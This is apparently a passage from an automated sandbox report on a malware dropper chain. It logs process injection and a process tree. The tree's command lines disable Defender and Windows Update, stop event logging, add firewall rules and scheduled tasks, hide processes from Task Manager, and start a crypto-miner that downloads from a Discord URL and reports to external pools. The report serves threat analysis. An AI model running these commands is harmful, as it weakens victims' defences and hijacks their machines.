SeShutdownPrivilege 3568 Process not Found Token: SeCreatePagefilePrivilege 3568 Process not Found Token: SeShutdownPrivilege 3568 Process not Found Token: SeCreatePagefilePrivilege 3568 Process not Found Token: SeShutdownPrivilege 3568 Process not Found Token: SeCreatePagefilePrivilege 3568 Process not Found Token: SeShutdownPrivilege 3568 Process not Found Token: SeCreatePagefilePrivilege 3568 Process not Found Token: SeShutdownPrivilege 3568 Process not Found Token: SeCreatePagefilePrivilege 3568 Process not Found Token: SeShutdownPrivilege 3568 Process not Found Token: SeCreatePagefilePrivilege 3568 Process not Found Token: SeShutdownPrivilege 3568 Process not Found Token: SeCreatePagefilePrivilege 3568 Process not Found Token: SeShutdownPrivilege 3568 Process not Found Token: SeCreatePagefilePrivilege 3568 Process not Found Token: SeShutdownPrivilege 3568 Process not Found Token: SeCreatePagefilePrivilege 3568 Process not Found Token: SeShutdownPrivilege 3568 Process not Found Token: SeCreatePagefilePrivilege 3568 Process not Found Token: SeDebugPrivilege 4032 powershell.exe Token: SeShutdownPrivilege 3568 Process not Found Token: SeCreatePagefilePrivilege 3568 Process not Found Token: SeShutdownPrivilege 3568 Process not Found Token: SeCreatePagefilePrivilege 3568 Process not Found Token: SeShutdownPrivilege 3568 Process not Found Token: SeCreatePagefilePrivilege 3568 Process not Found Token: SeDebugPrivilege 4888 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3156 wup.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3160 BroomSetup.exe 4968 fesa.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3568 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3004 wrote to memory of 2112 3004 WerFault.exe 87 PID 3004 wrote to memory of 2112 3004 WerFault.exe 87 PID 3004 wrote to memory of 2112 3004 WerFault.exe 87 PID 3004 wrote to memory of 2732 3004 WerFault.exe 276 PID 3004 wrote to memory of 2732 3004 WerFault.exe 276 PID 3004 wrote to memory of 2732 3004 WerFault.exe 276 PID 3004 wrote to memory of 1820 3004 WerFault.exe 95 PID 3004 wrote to memory of 1820 3004 WerFault.exe 95 PID 3004 wrote to memory of 1820 3004 WerFault.exe 95 PID 2112 wrote to memory of 3160 2112 InstallSetup7.exe 90 PID 2112 wrote to memory of 3160 2112 InstallSetup7.exe 90 PID 2112 wrote to memory of 3160 2112 InstallSetup7.exe 90 PID 3004 wrote to memory of 4380 3004 WerFault.exe 93 PID 3004 wrote to memory of 4380 3004 WerFault.exe 93 PID 3004 wrote to memory of 1816 3004 WerFault.exe 91 PID 3004 wrote to memory of 1816 3004 WerFault.exe 91 PID 2112 wrote to memory of 4440 2112 InstallSetup7.exe 246 PID 2112 wrote to memory of 4440 2112 InstallSetup7.exe 246 PID 2112 wrote to memory of 4440 2112 InstallSetup7.exe 246 PID 3160 wrote to memory of 2492 3160 BroomSetup.exe 133 PID 3160 wrote to memory of 2492 3160 BroomSetup.exe 133 PID 3160 wrote to memory of 2492 3160 BroomSetup.exe 133 PID 2492 wrote to memory of 4512 2492 cmd.exe 201 PID 2492 wrote to memory of 4512 2492 cmd.exe 201 PID 2492 wrote to memory of 4512 2492 cmd.exe 201 PID 2492 wrote to memory of 4660 2492 cmd.exe 120 PID 2492 wrote to memory of 4660 2492 cmd.exe 120 PID 2492 wrote to memory of 4660 2492 cmd.exe 120 PID 1820 wrote to memory of 1208 1820 31839b57a4f11171d6abc8bbc4451ee4.exe 142 PID 1820 wrote to memory of 1208 1820 31839b57a4f11171d6abc8bbc4451ee4.exe 142 PID 1820 wrote to memory of 1208 1820 31839b57a4f11171d6abc8bbc4451ee4.exe 142 PID 5016 wrote to memory of 3756 5016 31839b57a4f11171d6abc8bbc4451ee4.exe 164 PID 5016 wrote to memory of 3756 5016 31839b57a4f11171d6abc8bbc4451ee4.exe 164 PID 5016 wrote to memory of 3756 5016 31839b57a4f11171d6abc8bbc4451ee4.exe 164 PID 5016 wrote to memory of 1900 5016 31839b57a4f11171d6abc8bbc4451ee4.exe 177 PID 5016 wrote to memory of 1900 5016 31839b57a4f11171d6abc8bbc4451ee4.exe 177 PID 1900 wrote to memory of 4512 1900 WerFault.exe 201 PID 1900 wrote to memory of 4512 1900 WerFault.exe 201 PID 5016 wrote to memory of 516 5016 31839b57a4f11171d6abc8bbc4451ee4.exe 213 PID 5016 wrote to memory of 516 5016 31839b57a4f11171d6abc8bbc4451ee4.exe 213 PID 5016 wrote to memory of 516 5016 31839b57a4f11171d6abc8bbc4451ee4.exe 213 PID 5016 wrote to memory of 3284 5016 31839b57a4f11171d6abc8bbc4451ee4.exe 248 PID 5016 wrote to memory of 3284 5016 31839b57a4f11171d6abc8bbc4451ee4.exe 248 PID 5016 wrote to memory of 3284 5016 31839b57a4f11171d6abc8bbc4451ee4.exe 248 PID 5016 wrote to memory of 1168 5016 31839b57a4f11171d6abc8bbc4451ee4.exe 176 PID 5016 wrote to memory of 1168 5016 31839b57a4f11171d6abc8bbc4451ee4.exe 176 PID 5016 wrote to memory of 1168 5016 31839b57a4f11171d6abc8bbc4451ee4.exe 176 PID 1168 wrote to memory of 4032 1168 csrss.exe 193 PID 1168 wrote to memory of 4032 1168 csrss.exe 193 PID 1168 wrote to memory of 4032 1168 csrss.exe 193 PID 4440 wrote to memory of 960 4440 Conhost.exe 256 PID 4440 wrote to memory of 960 4440 Conhost.exe 256 PID 4440 wrote to memory of 960 4440 Conhost.exe 256 PID 960 wrote to memory of 3472 960 Conhost.exe 265 PID 960 wrote to memory of 3472 960 Conhost.exe 265 PID 960 wrote to memory of 3472 960 Conhost.exe 265 PID 1168 wrote to memory of 4888 1168 csrss.exe 207 PID 1168 wrote to memory of 4888 1168 csrss.exe 207 PID 1168 wrote to memory of 4888 1168 csrss.exe 207 PID 1168 wrote to memory of 516 1168 csrss.exe 213 PID 1168 wrote to memory of 516 1168 csrss.exe 213 PID 1168 wrote to memory of 516 1168 csrss.exe 213 PID 1168 wrote to memory of 216 1168 csrss.exe 219 PID 1168 wrote to memory of 216 1168 csrss.exe 219 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\latestrocki.exe"C:\Users\Admin\AppData\Local\Temp\latestrocki.exe"1⤵PID:3004
-
C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe"C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exeC:\Users\Admin\AppData\Local\Temp\BroomSetup.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3160 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:2492
-
-
-
C:\Users\Admin\AppData\Local\Temp\nso5D16.tmpC:\Users\Admin\AppData\Local\Temp\nso5D16.tmp3⤵PID:4440
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nso5D16.tmp" & del "C:\ProgramData\*.dll"" & exit4⤵PID:960
-
C:\Windows\SysWOW64\timeout.exetimeout /t 55⤵
- Delays execution with timeout.exe
PID:3472
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 24764⤵
- Program crash
PID:2400
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"2⤵PID:2732
-
-
C:\Users\Admin\AppData\Local\Temp\FirstZ.exe"C:\Users\Admin\AppData\Local\Temp\FirstZ.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1816 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵PID:2668
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:968
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"3⤵
- Launches sc.exe
PID:4736
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "WSNKISKT"3⤵
- Launches sc.exe
PID:2468
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:3204
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "WSNKISKT"3⤵
- Launches sc.exe
PID:4408
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2360
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵PID:3524
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵PID:4456
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵PID:3628
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:408
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:3264
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1640
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
PID:4092
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵PID:5028
-
-
-
C:\Users\Admin\AppData\Local\Temp\rty25.exe"C:\Users\Admin\AppData\Local\Temp\rty25.exe"2⤵
- Executes dropped EXE
PID:4380
-
-
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1820 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 3723⤵
- Program crash
PID:3388
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 3883⤵
- Program crash
PID:1660
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 3843⤵
- Program crash
PID:1404
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 6883⤵
- Program crash
PID:1060
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 7203⤵
- Program crash
PID:4028
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 7203⤵
- Program crash
PID:1392
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 7483⤵
- Program crash
PID:2256
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 7563⤵
- Program crash
PID:4344
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 7483⤵
- Program crash
PID:2680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 7483⤵
- Program crash
PID:4988
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 6683⤵
- Program crash
PID:2652
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 8763⤵
- Program crash
PID:2628
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 7923⤵
- Program crash
PID:4128
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 7883⤵
- Program crash
PID:320
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 9363⤵
- Program crash
PID:1128
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 9283⤵
- Program crash
PID:4008
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 9963⤵
- Program crash
PID:2404
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 10203⤵
- Program crash
PID:3948
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 7043⤵
- Program crash
PID:3204
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1208
-
-
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:5016 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 3524⤵
- Program crash
PID:2116
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 3644⤵
- Program crash
PID:4608
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 6524⤵
- Program crash
PID:3684
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 6924⤵
- Program crash
PID:768
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 7084⤵
- Program crash
PID:792
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 7084⤵
- Program crash
PID:3736
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 7244⤵
- Program crash
PID:1984
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 7444⤵
- Program crash
PID:4092
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3756
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 3364⤵
- Program crash
PID:2984
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"4⤵PID:1900
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes5⤵
- Modifies Windows Firewall
PID:4512
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:516
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:3284
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1168 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 3925⤵
- Program crash
PID:4984
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 6805⤵
- Program crash
PID:4964
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 7285⤵
- Program crash
PID:3736
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 7245⤵
- Program crash
PID:4116
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 7765⤵
- Program crash
PID:4220
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 7925⤵
- Program crash
PID:2484 -
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)6⤵
- Launches sc.exe
PID:3928
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:4032
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 7245⤵
- Program crash
PID:2624
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 3885⤵
- Program crash
PID:3264 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:3928
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 3725⤵
- Program crash
PID:4512
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 9725⤵
- Program crash
PID:3228
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 9285⤵
- Program crash
PID:4980
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4888
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f5⤵PID:2052
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- Creates scheduled task(s)
PID:628
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:516
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 9285⤵
- Program crash
PID:4584
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 9845⤵
- Program crash
PID:3096
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll5⤵
- Executes dropped EXE
PID:216
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 10045⤵
- Program crash
PID:4092
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 7605⤵
- Program crash
PID:5028 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵PID:1564
-
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- Creates scheduled task(s)
PID:1272
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"5⤵
- Executes dropped EXE
PID:4636 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)6⤵PID:2484
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 11245⤵
- Program crash
PID:4936
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 11405⤵
- Program crash
PID:2332
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 11565⤵
- Program crash
PID:2128
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 11165⤵
- Program crash
PID:2828
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 10525⤵
- Program crash
PID:3096
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 10765⤵
- Program crash
PID:228
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 10685⤵
- Program crash
PID:3364
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 11565⤵
- Program crash
PID:1300
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3348
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeC:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=uiGheigee2Wuisoh -m=https://cdn.discordapp.com/attachments/1176914652060459101/1177177956087504956/xDYNmhJEPV -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:805⤵
- Executes dropped EXE
PID:464 -
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exeC:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id 200e8a1e-3ea0-4957-9d39-5244c8436134 --tls --nicehash -o showlock.net:443 --rig-id 200e8a1e-3ea0-4957-9d39-5244c8436134 --tls --nicehash -o showlock.net:80 --rig-id 200e8a1e-3ea0-4957-9d39-5244c8436134 --nicehash --http-port 3433 --http-access-token 200e8a1e-3ea0-4957-9d39-5244c8436134 --randomx-wrmsr=-16⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:3156
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe -hide 31566⤵
- Executes dropped EXE
PID:4928 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 3407⤵
- Program crash
PID:5044
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 3567⤵
- Program crash
PID:3192
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 3567⤵
- Program crash
PID:3852
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 6647⤵
- Program crash
PID:1620
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 7007⤵
- Program crash
PID:2636
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 7007⤵
- Program crash
PID:4084
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 7367⤵
- Program crash
PID:2924
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 7447⤵
- Program crash
PID:1544
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 7447⤵
- Program crash
PID:2252
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:548
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Modifies data under HKEY_USERS
PID:2716
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 11965⤵
- Program crash
PID:2828
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exeC:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe5⤵PID:5116
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:1012
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1820 -ip 18201⤵PID:3288
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1820 -ip 18201⤵PID:4836
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1820 -ip 18201⤵PID:1564
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1820 -ip 18201⤵PID:404
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1820 -ip 18201⤵PID:1912
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1820 -ip 18201⤵PID:3444
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1820 -ip 18201⤵PID:3356
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1820 -ip 18201⤵PID:3912
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1820 -ip 18201⤵PID:2888
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1820 -ip 18201⤵PID:3752
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1820 -ip 18201⤵PID:2796
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F1⤵
- Creates scheduled task(s)
PID:4660
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1820 -ip 18201⤵PID:2236
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1820 -ip 18201⤵PID:516
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1820 -ip 18201⤵PID:3700
-
C:\Windows\SysWOW64\chcp.comchcp 12511⤵PID:4512
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1820 -ip 18201⤵PID:2260
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1820 -ip 18201⤵PID:3792
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1820 -ip 18201⤵PID:5056
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1820 -ip 18201⤵PID:1052
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1820 -ip 18201⤵PID:2508
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5016 -ip 50161⤵PID:2260
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5016 -ip 50161⤵PID:5116
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5016 -ip 50161⤵PID:3952
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5016 -ip 50161⤵PID:1580
-
